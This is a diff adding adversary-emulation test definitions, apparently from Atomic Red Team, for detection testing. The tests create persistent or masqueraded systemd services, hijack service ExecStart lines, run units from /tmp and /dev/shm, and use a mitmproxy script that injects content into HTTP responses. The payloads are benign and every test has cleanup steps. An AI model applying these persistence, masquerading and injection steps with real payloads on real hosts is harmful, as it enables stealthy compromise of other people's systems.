+
+```sh
+systemctl stop #{service_name}.service 2>/dev/null || true
+systemctl disable #{service_name}.service 2>/dev/null || true
+rm -f /etc/systemd/system/#{service_name}.service
+rm -f /etc/systemd/system/multi-user.target.wants/#{service_name}.service
+systemctl daemon-reload
+rm -f #{payload_path}
+rm -f /tmp/atomic_persist_output.txt
+```
+
+#### Dependencies: Run with `sh`!
+
+##### Description: systemctl must be available on the system
+
+###### Check Prereq Commands
+
+```sh
+if [ -x "$(command -v systemctl)" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "systemctl is not available. Ensure systemd is running on this system."
+```
+
+##### Description: The test must be run as root or with sudo privileges
+
+###### Check Prereq Commands
+
+```sh
+if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "This test requires root privileges. Run as root or use sudo."
+```
+
+##### Description: /etc/systemd/system/ directory must exist and be writable
+
+###### Check Prereq Commands
+
+```sh
+if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "/etc/systemd/system/ does not exist or is not writable."
+```
+
+##### Description: Payload script must exist at the specified path
+
+###### Check Prereq Commands
+
+```sh
+if [ -f "#{payload_path}" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo '#!/bin/bash' > #{payload_path}
+echo 'echo persistent >> /tmp/atomic_persist_output.txt' >> #{payload_path}
+chmod +x #{payload_path}
+```
+
+### Atomic Test #8: Masquerade Malicious Service as Legitimate System Service
+
+Creates a systemd service with a name and description closely resembling a legitimate
+system service to blend in with normal service activity. Adversaries may deliberately
+choose service names similar to well-known system services such as systemd-networkd,
+cron, or ssh to evade detection from analysts reviewing service lists or automated
+alerting on service names.
+
+This masquerading technique is particularly effective in environments where detection
+relies on service name allowlists or manual review of systemctl list-units output
+rather than behavioural analysis of service unit file contents and ExecStart paths.
+
+**Supported Platforms:** Linux
+
+**auto_generated_guid:** `6fec8560-ff64-4bbf-bc79-734fea48f7ca`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| masquerade_name | Service name designed to closely mimic a legitimate system service | string | systemd-network-helper|
+| command_to_run | Command the masquerading service will execute | string | /bin/bash -c "echo masquerade > /tmp/atomic_masquerade_output.txt"|
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+```sh
+echo "[Unit]" > /etc/systemd/system/#{masquerade_name}.service
+echo "Description=Network connectivity helper service" >> /etc/systemd/system/#{masquerade_name}.service
+echo "After=network.target" >> /etc/systemd/system/#{masquerade_name}.service
+echo "Before=network-online.target" >> /etc/systemd/system/#{masquerade_name}.service
+echo "" >> /etc/systemd/system/#{masquerade_name}.service
+echo "[Service]" >> /etc/systemd/system/#{masquerade_name}.service
+echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{masquerade_name}.service
+echo "Restart=on-failure" >> /etc/systemd/system/#{masquerade_name}.service
+echo "RestartSec=5" >> /etc/systemd/system/#{masquerade_name}.service
+echo "" >> /etc/systemd/system/#{masquerade_name}.service
+echo "[Install]" >> /etc/systemd/system/#{masquerade_name}.service
+echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{masquerade_name}.service
+systemctl daemon-reload
+systemctl start #{masquerade_name}.service
+systemctl status #{masquerade_name}.service
+```
+
+#### Cleanup Commands
+
+```sh
+systemctl stop #{masquerade_name}.service 2>/dev/null || true
+systemctl disable #{masquerade_name}.service 2>/dev/null || true
+rm -f /etc/systemd/system/#{masquerade_name}.service
+systemctl daemon-reload
+rm -f /tmp/atomic_masquerade_output.txt
+```
+
+#### Dependencies: Run with `sh`!
+
+##### Description: systemctl must be available on the system
+
+###### Check Prereq Commands
+
+```sh
+if [ -x "$(command -v systemctl)" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "systemctl is not available. Ensure systemd is running on this system."
+```
+
+##### Description: The test must be run as root or with sudo privileges
+
+###### Check Prereq Commands
+
+```sh
+if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "This test requires root privileges. Run as root or use sudo."
+```
+
+##### Description: /etc/systemd/system/ directory must exist and be writable
+
+###### Check Prereq Commands
+
+```sh
+if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "/etc/systemd/system/ does not exist or is not writable."
+```
+
+##### Description: Chosen masquerade service name must not already exist as a real service
+
+###### Check Prereq Commands
+
+```sh
+if ! systemctl list-unit-files --type=service | grep -q "^#{masquerade_name}.service"; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "A service named #{masquerade_name} already exists. Change the masquerade_name input argument to avoid conflicts."
+```
+

atomics/T1569.003/T1569.003.yaml

@@ -0,0 +1,498 @@
+attack_technique: T1569.003
+display_name: "System Services: Systemctl"
+atomic_tests:
+
+  - name: Create and Enable a Malicious systemd Service Unit
+    auto_generated_guid: e58c8723-5503-4533-b642-535cd20ec648
+    description: |
+      Creates a new systemd service unit file in /etc/systemd/system/ and enables it using
+      systemctl enable followed by systemctl start. Adversaries commonly abuse this workflow
+      to establish persistence or execute arbitrary commands under the context of systemd.
+
+      This simulates the full attacker workflow: writing the unit file, reloading the systemd
+      daemon, enabling the service to survive reboots, and starting it immediately. This is
+      consistent with techniques observed in ransomware precursor activity and post-exploitation
+      frameworks targeting Linux infrastructure.
+    supported_platforms:
+      - linux
+    input_arguments:
+      service_name:
+        description: Name of the malicious service to create
+        type: string
+        default: atomic-test
+      command_to_run:
+        description: Command the service will execute
+        type: string
+        default: /bin/bash -c "echo atomictest > /tmp/atomic_service_output.txt"
+    dependency_executor_name: sh
+    dependencies:
+      - description: |
+          systemctl must be available on the system
+        prereq_command: |
+          if [ -x "$(command -v systemctl)" ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "systemctl is not available. Ensure systemd is running on this system."
+      - description: |
+          The test must be run as root or with sudo privileges
+        prereq_command: |
+          if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "This test requires root privileges. Run as root or use sudo."
+      - description: |
+          /etc/systemd/system/ directory must exist and be writable
+        prereq_command: |
+          if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system" ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "/etc/systemd/system/ does not exist or is not writable. Ensure systemd is installed."
+    executor:
+      name: sh
+      elevation_required: true
+      command: |
+        echo "[Unit]" > /etc/systemd/system/#{service_name}.service
+        echo "Description=Atomic Test Service" >> /etc/systemd/system/#{service_name}.service
+        echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
+        echo "" >> /etc/systemd/system/#{service_name}.service
+        echo "[Service]" >> /etc/systemd/system/#{service_name}.service
+        echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{service_name}.service
+        echo "Restart=on-failure" >> /etc/systemd/system/#{service_name}.service
+        echo "" >> /etc/systemd/system/#{service_name}.service
+        echo "[Install]" >> /etc/systemd/system/#{service_name}.service
+        echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
+        systemctl daemon-reload
+        systemctl enable #{service_name}.service
+        systemctl start #{service_name}.service
+        systemctl status #{service_name}.service
+      cleanup_command: |
+        systemctl stop #{service_name}.service 2>/dev/null || true
+        systemctl disable #{service_name}.service 2>/dev/null || true
+        rm -f /etc/systemd/system/#{service_name}.service
+        systemctl daemon-reload
+        rm -f /tmp/atomic_service_output.txt
+
+
+  - name: Create systemd Service Unit from /tmp (Unusual Location)
+    auto_generated_guid: a1fa406e-2354-4a24-b6d6-94157e7564d4
+    description: |
+      Creates a systemd service unit file in /tmp and loads it using systemctl start with
+      an absolute path. Adversaries may write service unit files to world-writable directories
+      such as /tmp to avoid triggering alerts on new file creation in standard service
+      directories, or to execute payloads transiently without permanently installing a service.
+
+      Loading a service unit from an arbitrary path rather than a standard systemd directory
+      is unusual behaviour that should be detectable by monitoring systemctl command arguments.
+    supported_platforms:
+      - linux
+    input_arguments:
+      service_path:
+        description: Full path to the service file to be written in /tmp
+        type: path
+        default: /tmp/atomic_tmp.service
+      command_to_run:
+        description: Command the service will execute
+        type: string
+        default: /bin/bash -c "id > /tmp/atomic_tmp_output.txt"
+    dependency_executor_name: sh
+    dependencies:
+      - description: |
+          systemctl must be available on the system
+        prereq_command: |
+          if [ -x "$(command -v systemctl)" ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "systemctl is not available. Ensure systemd is running on this system."
+      - description: |
+          /tmp must exist and be writable
+        prereq_command: |
+          if [ -d "/tmp" ] && [ -w "/tmp" ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "/tmp does not exist or is not writable on this system."
+      - description: |
+          The test must be run as root or with sudo privileges
+        prereq_command: |
+          if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "This test requires root privileges. Run as root or use sudo."
+    executor:
+      name: sh
+      elevation_required: true
+      command: |
+        echo "[Unit]" > #{service_path}
+        echo "Description=Atomic Tmp Service" >> #{service_path}
+        echo "" >> #{service_path}
+        echo "[Service]" >> #{service_path}
+        echo "ExecStart=#{command_to_run}" >> #{service_path}
+        echo "" >> #{service_path}
+        echo "[Install]" >> #{service_path}
+        echo "WantedBy=multi-user.target" >> #{service_path}
+        systemctl link #{service_path}
+        systemctl start $(basename #{service_path})
+        systemctl status $(basename #{service_path})
+      cleanup_command: |
+        systemctl stop $(basename #{service_path}) 2>/dev/null || true
+        rm -f #{service_path}
+        rm -f /tmp/atomic_tmp_output.txt
+
+
+  - name: Create systemd Service Unit from /dev/shm (Unusual Location)
+    auto_generated_guid: dce49381-a26b-4d95-bdfa-c607ffe8bee5
+    description: |
+      Creates a systemd service unit file in /dev/shm and loads it using systemctl.
+      /dev/shm is a memory-backed filesystem that is world-writable on most Linux systems
+      and does not persist across reboots, making it particularly attractive to adversaries
+      seeking to execute transient payloads while evading file-based forensic detection.
+
+      This technique has been observed in post-exploitation scenarios where attackers
+      deliberately avoid writing to disk-backed locations to limit forensic artefacts.
+    supported_platforms:
+      - linux
+    input_arguments:
+      service_path:
+        description: Full path to the service file to be written in /dev/shm
+        type: path
+        default: /dev/shm/atomic_shm.service
+      command_to_run:
+        description: Command the service will execute
+        type: string
+        default: /bin/bash -c "whoami > /tmp/atomic_shm_output.txt"
+    dependency_executor_name: sh
+    dependencies:
+      - description: |
+          systemctl must be available on the system
+        prereq_command: |
+          if [ -x "$(command -v systemctl)" ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "systemctl is not available. Ensure systemd is running on this system."
+      - description: |
+          /dev/shm must exist and be writable
+        prereq_command: |
+          if [ -d "/dev/shm" ] && [ -w "/dev/shm" ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "/dev/shm does not exist or is not writable on this system."
+      - description: |
+          The test must be run as root or with sudo privileges
+        prereq_command: |
+          if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "This test requires root privileges. Run as root or use sudo."
+    executor:
+      name: sh
+      elevation_required: true
+      command: |
+        echo "[Unit]" > #{service_path}
+        echo "Description=Atomic SHM Service" >> #{service_path}
+        echo "" >> #{service_path}
+        echo "[Service]" >> #{service_path}
+        echo "ExecStart=#{command_to_run}" >> #{service_path}
+        echo "" >> #{service_path}
+        echo "[Install]" >> #{service_path}
+        echo "WantedBy=multi-user.target" >> #{service_path}
+        systemctl link #{service_path}
+        systemctl start $(basename #{service_path})
+        systemctl status $(basename #{service_path})
+      cleanup_command: |
+        systemctl stop $(basename #{service_path}) 2>/dev/null || true
+        rm -f #{service_path}
+        rm -f /tmp/atomic_shm_output.txt
+
+
+  - name: Modify Existing systemd Service to Execute Malicious Command
+    auto_generated_guid: 6123928f-6389-4914-8d25-a5d69bd657fa
+    description: |
+      Creates a service unit file that initially runs a benign command, then modifies the
+      ExecStart directive using sed to substitute a malicious command before reloading and
+      restarting the service. Adversaries may hijack existing services to blend in with normal
+      service activity and avoid triggering detections focused solely on new service creation.
+
+      This technique reflects the tradecraft observed in more sophisticated intrusions where
+      blending into existing process trees is a priority over creating net-new services.
+    supported_platforms:
+      - linux
+    input_arguments:
+      service_name:
+        description: Name of the service to create and then modify for the test
+        type: string
+        default: atomic-modify-test
+      malicious_command:
+        description: Malicious command to substitute into ExecStart
+        type: string
+        default: /bin/bash -c "echo hijacked > /tmp/atomic_hijack_output.txt"
+    dependency_executor_name: sh
+    dependencies:
+      - description: |
+          systemctl must be available on the system
+        prereq_command: |
+          if [ -x "$(command -v systemctl)" ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "systemctl is not available. Ensure systemd is running on this system."
+      - description: |
+          sed must be available on the system
+        prereq_command: |
+          if [ -x "$(command -v sed)" ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          apt-get install -y sed 2>/dev/null || yum install -y sed 2>/dev/null || echo "Could not install sed automatically."
+      - description: |
+          The test must be run as root or with sudo privileges
+        prereq_command: |
+          if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "This test requires root privileges. Run as root or use sudo."
+      - description: |
+          /etc/systemd/system/ directory must exist and be writable
+        prereq_command: |
+          if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system" ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "/etc/systemd/system/ does not exist or is not writable."
+    executor:
+      name: sh
+      elevation_required: true
+      command: |
+        echo "[Unit]" > /etc/systemd/system/#{service_name}.service
+        echo "Description=Legitimate Looking Service" >> /etc/systemd/system/#{service_name}.service
+        echo "" >> /etc/systemd/system/#{service_name}.service
+        echo "[Service]" >> /etc/systemd/system/#{service_name}.service
+        echo "ExecStart=/bin/true" >> /etc/systemd/system/#{service_name}.service
+        echo "" >> /etc/systemd/system/#{service_name}.service
+        echo "[Install]" >> /etc/systemd/system/#{service_name}.service
+        echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
+        systemctl daemon-reload
+        sed -i 's|ExecStart=.*|ExecStart=#{malicious_command}|' /etc/systemd/system/#{service_name}.service
+        systemctl daemon-reload
+        systemctl start #{service_name}.service
+        systemctl status #{service_name}.service
+      cleanup_command: |
+        systemctl stop #{service_name}.service 2>/dev/null || true
+        systemctl disable #{service_name}.service 2>/dev/null || true
+        rm -f /etc/systemd/system/#{service_name}.service
+        systemctl daemon-reload
+        rm -f /tmp/atomic_hijack_output.txt
+
+
+  - name: Execute Command via Transient systemd Service (systemd-run)
+    auto_generated_guid: a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236
+    description: |
+      Uses systemd-run to execute a command as a transient systemd service without creating
+      a persistent unit file on disk. Adversaries may use systemd-run to execute arbitrary
+      commands under the context of systemd while bypassing controls that monitor for new
+      unit file creation, since transient services exist only in memory for their lifetime.
+
+      This is a particularly stealthy technique as it leaves minimal on-disk artefacts and
+      the service disappears from systemctl list-units once execution completes.
+    supported_platforms:
+      - linux
+    input_arguments:
+      unit_name:
+        description: Name of the transient systemd unit to create
+        type: string
+        default: atomic-transient
+      command_to_run:
+        description: Command to execute as a transient service
+        type: string
+        default: /bin/bash -c "id > /tmp/atomic_transient_output.txt"
+    dependency_executor_name: sh
+    dependencies:
+      - description: |
+          systemd-run must be available on the system
+        prereq_command: |
+          if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "systemd-run is not available. Ensure systemd is installed and up to date."
+      - description: |
+          The test must be run as root or with sudo privileges
+        prereq_command: |
+          if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "This test requires root privileges. Run as root or use sudo."
+    executor:
+      name: sh
+      elevation_required: true
+      command: |
+        systemd-run --unit=#{unit_name} --wait #{command_to_run}
+        systemctl status #{unit_name}.service 2>/dev/null || echo "Transient service has already completed and exited."
+      cleanup_command: |
+        systemctl stop #{unit_name}.service 2>/dev/null || true
+        rm -f /tmp/atomic_transient_output.txt
+
+
+  - name: Enumerate All systemd Services Using systemctl
+    auto_generated_guid: 1e5be8d4-605a-4acb-8709-2f80b2d8ea95
+    description: |
+      Enumerates all systemd services and their current states using systemctl list-units
+      and systemctl list-unit-files. Adversaries may enumerate running and enabled services
+      to identify targets for hijacking, understand the host environment, map installed
+      security tooling, or identify gaps in monitoring coverage.
+
+      Service enumeration is a common reconnaissance step during post-exploitation and may
+      precede service hijacking or masquerading activity. This test does not require
+      elevation as service listing is available to unprivileged users on most Linux systems.
+    supported_platforms:
+      - linux
+    dependency_executor_name: sh
+    dependencies:
+      - description: |
+          systemctl must be available on the system
+        prereq_command: |
+          if [ -x "$(command -v systemctl)" ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "systemctl is not available. Ensure systemd is running on this system."
+    executor:
+      name: sh
+      elevation_required: false
+      command: |
+        systemctl list-units --type=service --all
+        systemctl list-unit-files --type=service
+      cleanup_command: |
+        echo "No cleanup required"
+
+
+  - name: Enable systemd Service for Persistence with Auto-Restart
+    auto_generated_guid: 2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7
+    description: |
+      Creates a payload script and a systemd service unit that executes it, then enables
+      the service to survive reboots using systemctl enable. The service is configured with
+      Restart=always to automatically restart on failure, mimicking the persistence mechanism
+      used by adversaries deploying backdoors or beacons on Linux hosts.
+
+      This technique is consistent with observed post-exploitation tradecraft where adversaries
+      establish a foothold that survives reboots and self-heals after interruption, complicating
+      incident response and remediation efforts.
+    supported_platforms:
+      - linux
+    input_arguments:
+      service_name:
+        description: Name of the persistence service to create
+        type: string
+        default: atomic-persist
+      payload_path:
+        description: Path to the payload script that the service will execute
+        type: path
+        default: /tmp/atomic_payload.sh
+    dependency_executor_name: sh
+    dependencies:
+      - description: |
+          systemctl must be available on the system
+        prereq_command: |
+          if [ -x "$(command -v systemctl)" ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "systemctl is not available. Ensure systemd is running on this system."
+      - description: |
+          The test must be run as root or with sudo privileges
+        prereq_command: |
+          if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "This test requires root privileges. Run as root or use sudo."
+      - description: |
+          /etc/systemd/system/ directory must exist and be writable
+        prereq_command: |
+          if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system" ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "/etc/systemd/system/ does not exist or is not writable."
+      - description: |
+          Payload script must exist at the specified path
+        prereq_command: |
+          if [ -f "#{payload_path}" ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo '#!/bin/bash' > #{payload_path}
+          echo 'echo persistent >> /tmp/atomic_persist_output.txt' >> #{payload_path}
+          chmod +x #{payload_path}
+    executor:
+      name: sh
+      elevation_required: true
+      command: |
+        echo "[Unit]" > /etc/systemd/system/#{service_name}.service
+        echo "Description=Atomic Persistence Service" >> /etc/systemd/system/#{service_name}.service
+        echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
+        echo "" >> /etc/systemd/system/#{service_name}.service
+        echo "[Service]" >> /etc/systemd/system/#{service_name}.service
+        echo "ExecStart=#{payload_path}" >> /etc/systemd/system/#{service_name}.service
+        echo "Restart=always" >> /etc/systemd/system/#{service_name}.service
+        echo "RestartSec=10" >> /etc/systemd/system/#{service_name}.service
+        echo "" >> /etc/systemd/system/#{service_name}.service
+        echo "[Install]" >> /etc/systemd/system/#{service_name}.service
+        echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
+        systemctl daemon-reload
+        systemctl enable #{service_name}.service
+        systemctl start #{service_name}.service
+        systemctl status #{service_name}.service
+      cleanup_command: |
+        systemctl stop #{service_name}.service 2>/dev/null || true
+        systemctl disable #{service_name}.service 2>/dev/null || true
+        rm -f /etc/systemd/system/#{service_name}.service
+        rm -f /etc/systemd/system/multi-user.target.wants/#{service_name}.service
+        systemctl daemon-reload
+        rm -f #{payload_path}
+        rm -f /tmp/atomic_persist_output.txt
+
+
+  - name: Masquerade Malicious Service as Legitimate System Service
+    auto_generated_guid: 6fec8560-ff64-4bbf-bc79-734fea48f7ca
+    description: |
+      Creates a systemd service with a name and description closely resembling a legitimate
+      system service to blend in with normal service activity. Adversaries may deliberately
+      choose service names similar to well-known system services such as systemd-networkd,
+      cron, or ssh to evade detection from analysts reviewing service lists or automated
+      alerting on service names.
+
+      This masquerading technique is particularly effective in environments where detection
+      relies on service name allowlists or manual review of systemctl list-units output
+      rather than behavioural analysis of service unit file contents and ExecStart paths.
+    supported_platforms:
+      - linux
+    input_arguments:
+      masquerade_name:
+        description: Service name designed to closely mimic a legitimate system service
+        type: string
+        default: systemd-network-helper
+      command_to_run:
+        description: Command the masquerading service will execute
+        type: string
+        default: /bin/bash -c "echo masquerade > /tmp/atomic_masquerade_output.txt"
+    dependency_executor_name: sh
+    dependencies:
+      - description: |
+          systemctl must be available on the system
+        prereq_command: |
+          if [ -x "$(command -v systemctl)" ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "systemctl is not available. Ensure systemd is running on this system."
+      - description: |
+          The test must be run as root or with sudo privileges
+        prereq_command: |
+          if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "This test requires root privileges. Run as root or use sudo."
+      - description: |
+          /etc/systemd/system/ directory must exist and be writable
+        prereq_command: |
+          if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system" ]; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "/etc/systemd/system/ does not exist or is not writable."
+      - description: |
+          Chosen masquerade service name must not already exist as a real service
+        prereq_command: |
+          if ! systemctl list-unit-files --type=service | grep -q "^#{masquerade_name}.service"; then exit 0; else exit 1; fi
+        get_prereq_command: |
+          echo "A service named #{masquerade_name} already exists. Change the masquerade_name input argument to avoid conflicts."
+    executor:
+      name: sh
+      elevation_required: true
+      command: |
+        echo "[Unit]" > /etc/systemd/system/#{masquerade_name}.service
+        echo "Description=Network connectivity helper service" >> /etc/systemd/system/#{masquerade_name}.service
+        echo "After=network.target" >> /etc/systemd/system/#{masquerade_name}.service
+        echo "Before=network-online.target" >> /etc/systemd/system/#{masquerade_name}.service
+        echo "" >> /etc/systemd/system/#{masquerade_name}.service
+        echo "[Service]" >> /etc/systemd/system/#{masquerade_name}.service
+        echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{masquerade_name}.service
+        echo "Restart=on-failure" >> /etc/systemd/system/#{masquerade_name}.service
+        echo "RestartSec=5" >> /etc/systemd/system/#{masquerade_name}.service
+        echo "" >> /etc/systemd/system/#{masquerade_name}.service
+        echo "[Install]" >> /etc/systemd/system/#{masquerade_name}.service
+        echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{masquerade_name}.service
+        systemctl daemon-reload
+        systemctl start #{masquerade_name}.service
+        systemctl status #{masquerade_name}.service
+      cleanup_command: |
+        systemctl stop #{masquerade_name}.service 2>/dev/null || true
+        systemctl disable #{masquerade_name}.service 2>/dev/null || true
+        rm -f /etc/systemd/system/#{masquerade_name}.service
+        systemctl daemon-reload
+        rm -f /tmp/atomic_masquerade_output.txt

atomics/T1659/T1659.md

@@ -0,0 +1,213 @@
+# T1659 - Content Injection
+
+## Description from ATT&CK
+
+> Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) followed by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and other data to already compromised systems.(Citation: ESET MoustachedBouncer)
+> 
+> Adversaries may inject content to victim systems in various ways, including:
+> 
+> * From the middle, where the adversary is in-between legitimate online client-server communications (**Note:** this is similar but distinct from [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557), which describes AiTM activity solely within an enterprise environment) (Citation: Kaspersky Encyclopedia MiTM)
+> * From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server (Citation: Kaspersky ManOnTheSide)
+> 
+> Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception."(Citation: Kaspersky ManOnTheSide)(Citation: ESET MoustachedBouncer)(Citation: EFF China GitHub Attack)
+
+[Source](https://attack.mitre.org/techniques/T1659)
+
+## Atomic Tests
+
+- [Atomic Test #1: MITM Proxy Injection](#atomic-test-1-mitm-proxy-injection)
+- [Atomic Test #2: MITM Proxy Injection (Windows)](#atomic-test-2-mitm-proxy-injection-windows)
+
+### Atomic Test #1: MITM Proxy Injection
+
+Start mitmdump and verify injected header and HTML content.
+
+**Supported Platforms:** macOS, Linux
+
+**auto_generated_guid:** `9b360eaf-c778-4f07-a6e7-895c4f01ac1c`
+
+#### Attack Commands: Run with `bash`!
+
+```bash
+curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
+grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
+curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
+grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
+```
+
+#### Cleanup Commands
+
+```bash
+rm -rf /tmp/atomic_t1659_inject.py
+rm -rf /tmp/atomic_t1659.log
+rm -rf /tmp/curl_out.txt
+rm -rf /tmp/atomic_t1659_page.html
+pkill -f mitmdump || true
+```
+
+#### Dependencies: Run with `bash`!
+
+##### Description: python3 must be installed
+
+###### Check Prereq Commands
+
+```bash
+command -v python3
+```
+
+###### Get Prereq Commands
+
+```bash
+brew install python3 || (sudo apt-get update && sudo apt-get install -y python3) || sudo yum install -y python3
+```
+
+##### Description: curl must be installed
+
+###### Check Prereq Commands
+
+```bash
+command -v curl
+```
+
+###### Get Prereq Commands
+
+```bash
+brew install curl || (sudo apt-get update && sudo apt-get install -y curl) || sudo yum install -y curl
+```
+
+##### Description: pipx must be installed
+
+###### Check Prereq Commands
+
+```bash
+pipx --version
+```
+
+###### Get Prereq Commands
+
+```bash
+brew install pipx || (sudo apt-get update && sudo apt-get install -y pipx) || sudo yum install -y pipx
+```
+
+##### Description: mitmproxy must be installed
+
+###### Check Prereq Commands
+
+```bash
+pipx list | grep mitmproxy
+```
+
+###### Get Prereq Commands
+
+```bash
+pipx install mitmproxy || brew install mitmproxy
+```
+
+##### Description: mitmdump must be running on port 8080
+
+###### Check Prereq Commands
+
+```bash
+lsof -i tcp:8080 | grep mitmdump
+```
+
+###### Get Prereq Commands
+
+```bash
+printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n    if 'text/html' in flow.response.headers.get('content-type',''):\n        flow.response.headers['X-Atomic']='T1659'\n        flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
+($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
+sleep 5
+lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
+```
+
+### Atomic Test #2: MITM Proxy Injection (Windows)
+
+Start mitmdump proxy with injection script in the background.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `dcc2ca85-a21c-43a4-acc7-7314d4e5891c`
+
+#### Attack Commands: Run with `powershell`!
+
+```powershell
+curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
+if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
+$OutPath = "$env:TEMP\atomic_t1659_page.html"
+curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
+$Content = Get-Content -Path $OutPath -Raw
+if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
+```
+
+#### Cleanup Commands
+
+```powershell
+Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
+Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
+Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
+Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
+Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue
+```
+
+#### Dependencies: Run with `powershell`!
+
+##### Description: Python must be installed
+
+###### Check Prereq Commands
+
+```powershell
+if (Get-Command python -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
+```
+
+###### Get Prereq Commands
+
+```powershell
+winget install --id Python.Python.3 -e
+```
+
+##### Description: curl must be installed
+
+###### Check Prereq Commands
+
+```powershell
+if (Get-Command curl.exe -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
+```
+
+###### Get Prereq Commands
+
+```powershell
+winget install --id cURL.cURL -e
+```
+
+##### Description: mitmproxy must be installed and in PATH
+
+###### Check Prereq Commands
+
+```powershell
+if (Get-Command mitmdump -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
+```
+
+###### Get Prereq Commands
+
+```powershell
+python -m pip install mitmproxy
+```
+
+##### Description: mitmdump must be running on port 8080
+
